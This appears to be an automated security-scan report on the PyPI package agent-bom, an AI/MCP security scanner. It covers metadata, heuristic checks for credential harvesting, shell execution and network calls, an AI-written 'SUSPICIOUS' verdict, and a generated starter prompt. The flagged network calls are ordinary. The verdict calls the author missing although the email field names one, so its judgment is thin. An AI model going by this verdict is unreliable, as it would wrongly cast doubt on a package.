Package Metadata

Author: —
Email: Wagdy Saad <[email protected]>
PyPI: agent-bom
Python: >=3.11
Versions: 135 releases
First release: 19 Feb 2026, 08:33 UTC
Analysed: 06 Jun 2026, 05:51 UTC
Source files: 62 .py files scanned

Project Links

Changelog Documentation Homepage Issues Repository Security Policy Trust & Permissions

Classifiers

Development Status :: 4 - BetaEnvironment :: ConsoleIntended Audience :: DevelopersIntended Audience :: Information TechnologyIntended Audience :: System AdministratorsProgramming Language :: Python :: 3Programming Language :: Python :: 3 :: OnlyProgramming Language :: Python :: 3.11Programming Language :: Python :: 3.13Programming Language :: Python :: 3.14

🤖 AI Analysis

Final verdict: SUSPICIOUS

The package has a moderate risk score due to incomplete metadata and network calls, though no direct evidence of malicious activity was found.

Incomplete author metadata and potentially new/inactive account
External network calls requiring further investigation

Per-check LLM notes

Network: The package makes external network calls which could be legitimate depending on its functionality, but requires further investigation into the purpose and destinations.
Shell: No shell execution patterns were detected.
Obfuscation: No obfuscation patterns detected, indicating low risk of malicious intent.
Credentials: No credential harvesting patterns detected, suggesting safe handling of secrets and credentials.
Metadata: The author's information is incomplete and the account seems new or inactive, raising some concerns but not definitive signs of malice.

🔬 Heuristic Checks

⚠ Outbound Network Calls score 9.0

Found 6 network call pattern(s)

None try: resp = httpx.get(jwks_uri, timeout=10.0, follow_redirects=False) resp
tion" try: resp = httpx.get(discovery_url, timeout=10.0, follow_redirects=False)
y.""" try: resp = httpx.get(f"{OLLAMA_BASE_URL}/api/tags", timeout=2.0) return r
s.""" try: resp = httpx.get(f"{OLLAMA_BASE_URL}/api/tags", timeout=2.0) if resp.
try: async with httpx.AsyncClient(timeout=120.0) as client: resp = await client.po
n_schema() async with httpx.AsyncClient(timeout=120.0) as client: resp = await client.po

✓ Code Obfuscation

No obfuscation patterns detected

✓ Shell / Subprocess Execution

No shell execution patterns detected

✓ Credential Harvesting

No credential harvesting patterns detected

✓ Typosquatting

No typosquatting candidates detected

✓ Registered Email Domain

Email domain looks legitimate: gmail.com>

✓ Suspicious Page Links

All external links appear legitimate

✓ Git Repository History

Repository msaad00/agent-bom appears legitimate

⚠ Maintainer History score 4.0

2 maintainer concern(s) found

Author name is missing or very short
Author "" appears to have only 1 package on PyPI (new or inactive account)

✓ Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with agent-bom

Create a comprehensive security dashboard application using the 'agent-bom' package, which acts as an open security scanner and self-hosted control plane for AI/MCP infrastructure. Your task is to develop a user-friendly web interface where users can input their AI/MCP infrastructure details and receive real-time security insights and alerts.

### Step-by-Step Guide:
1. **Setup Environment**: Begin by setting up your Python environment and installing the necessary packages including 'agent-bom'. Ensure you have Flask or Django installed for web development purposes.
2. **Define Infrastructure Input**: Design a form within your web app that allows users to input details about their AI/MCP infrastructure such as IP addresses, ports, and specific services they wish to monitor.
3. **Integrate 'agent-bom'**: Utilize 'agent-bom' to scan the provided infrastructure for potential security vulnerabilities. This involves calling relevant functions from the 'agent-bom' package based on the user inputs.
4. **Generate Reports**: Once the scanning process is complete, generate a detailed report that highlights any identified vulnerabilities, their severity, and recommended actions.
5. **Real-Time Alerts**: Implement a feature that sends real-time alerts to users via email or SMS if critical vulnerabilities are detected during the scan.
6. **Dashboard Interface**: Develop a clean and intuitive dashboard where users can view the status of their scans, access reports, and manage alerts.
7. **User Management**: Add functionality for user registration and login to allow multiple users to manage their respective infrastructures through the same platform.
8. **Testing & Deployment**: Thoroughly test all components of the application before deploying it to a live server.

### Suggested Features:
- Automated periodic scans based on user-defined schedules.
- Integration with external vulnerability databases for more accurate assessments.
- Historical data tracking and comparison to monitor changes over time.
- Detailed documentation and user guides for easy setup and use.

By following these steps and incorporating the suggested features, you will create a robust and user-friendly tool that leverages the capabilities of 'agent-bom' to enhance the security posture of AI/MCP infrastructures.